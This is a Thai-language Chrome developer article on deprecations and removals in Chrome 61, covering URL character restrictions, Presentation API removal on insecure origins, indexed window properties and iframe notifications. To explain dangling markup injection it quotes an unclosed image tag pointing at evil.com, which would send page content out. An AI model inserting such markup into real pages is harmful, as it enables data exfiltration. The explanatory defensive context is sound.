การเลิกใช้งานและการนำออกใน Chrome 61

Joe Medley
Joe Medley
GitHub

ใน Chrome เกือบทุกเวอร์ชัน เราเห็นการอัปเดตและการปรับปรุงผลิตภัณฑ์ ประสิทธิภาพ และความสามารถของแพลตฟอร์มเว็บเป็นจำนวนมาก บทความนี้อธิบายการเลิกใช้งานและการนำออกใน Chrome 61 ซึ่งอยู่ในรุ่นเบต้าตั้งแต่วันที่ 3 สิงหาคม รายการนี้อาจมีการเปลี่ยนแปลงได้ทุกเมื่อ

ความปลอดภัยและความเป็นส่วนตัว

บล็อกทรัพยากรที่ URL มีอักขระ '\n' และ '<'

การแฮ็กประเภทหนึ่งเรียกว่าการแทรกมาร์กอัปที่ตัดขาด ซึ่งจะใช้ URL ที่ตัดให้สั้นลงเพื่อส่งข้อมูลไปยังปลายทางภายนอก เช่น ลองพิจารณาหน้าเว็บที่มี <img src='https://evil.com/? เนื่องจาก URL ไม่มีเครื่องหมายคำพูดปิด เบราว์เซอร์จะอ่านเครื่องหมายคำพูดถัดไปที่ปรากฏขึ้นและถือว่าอักขระที่ปิดอยู่นั้นเป็น URL เดียว

Chrome 61 ช่วยลดช่องโหว่นี้ด้วยการจำกัดชุดอักขระที่อนุญาตให้ใช้ในแอตทริบิวต์ href และ src กล่าวโดยละเอียดคือ Chrome จะหยุดประมวลผล URL เมื่อพบอักขระขึ้นบรรทัดใหม่ (\n) และอักขระน้อยกว่า (<)

นักพัฒนาแอปที่มี Use Case ที่ถูกต้องสำหรับอักขระขึ้นบรรทัดใหม่และอักขระน้อยกว่าใน URL ควรหลีกอักขระเหล่านี้แทน

Intent to Remove | Chromestatus Tracker | ข้อบกพร่องของ Chromium

เลิกใช้งานและนํา Presentation API ในบริบทที่ไม่ปลอดภัยออก

เราพบว่า Presentation API สามารถใช้เป็นเวกเตอร์การแฮ็กในต้นทางที่ไม่ปลอดภัย เนื่องจากจอแสดงผลไม่มีแถบที่อยู่ จึงสามารถใช้ API เพื่อปลอมแปลงเนื้อหาได้ นอกจากนี้ ยังอาจมีการลักลอบนำข้อมูลจากงานนำเสนอที่กำลังดำเนินอยู่ออกด้วย

เพื่อให้สอดคล้องกับความตั้งใจของ Blink ที่จะนำฟีเจอร์ที่มีประสิทธิภาพออกจากต้นทางที่ไม่ปลอดภัย เราจึงวางแผนที่จะเลิกใช้งานและนำการรองรับ Presentation API ในบริบทที่ไม่ปลอดภัยออก ตั้งแต่ Chrome 61 เป็นต้นไป PresentationRequest.start() จะไม่ทำงานในต้นทางที่ไม่ปลอดภัยอีกต่อไป

Intent to Remove | Chromestatus Tracker | ข้อบกพร่องของ Chromium

JavaScript

ไม่อนุญาตให้กําหนดพร็อพเพอร์ตี้ที่จัดทําดัชนีใน Windows

ก่อนหน้านี้เบราว์เซอร์บางรุ่นอนุญาตให้ใช้การกําหนดค่า JavaScript ดังต่อไปนี้

    window[0] = 1;

หมายเหตุเกี่ยวกับข้อกำหนด HTML ปัจจุบันระบุว่าการดำเนินการนี้เป็นการละเมิดข้อกำหนด JavaScript อย่างชัดแจ้ง เราจึงนำความสามารถนี้ออกจาก Chrome 61 ตั้งแต่เดือนกุมภาพันธ์ 2016 เป็นต้นไป Firefox ปฏิบัติตามข้อกำหนดแล้ว

ข้อบกพร่องของ Chromium

นำการใช้งานการแจ้งเตือนออกจาก iframe ที่ไม่ปลอดภัย

คำขอสิทธิ์จาก iframe อาจทำให้ผู้ใช้สับสน เนื่องจากแยกแหล่งที่มาของหน้าเว็บที่รวมอยู่และแหล่งที่มาของ iframe ที่กำลังส่งคำขอได้ยาก เมื่อขอบเขตของคำขอไม่ชัดเจน ผู้ใช้จะตัดสินใจได้ยากว่าจะให้หรือปฏิเสธสิทธิ์

การไม่อนุญาตการแจ้งเตือนใน iframe จะปรับข้อกำหนดสำหรับสิทธิ์การแจ้งเตือนให้สอดคล้องกับสิทธิ์ของข้อความ Push ด้วย ซึ่งจะช่วยให้นักพัฒนาแอปทำงานได้ง่ายขึ้น

นักพัฒนาแอปที่ต้องการฟังก์ชันการทำงานนี้สามารถเปิดหน้าต่างใหม่เพื่อขอสิทธิ์การแจ้งเตือน

Intent to Remove | Chromestatus Tracker | ข้อบกพร่องของ Chromium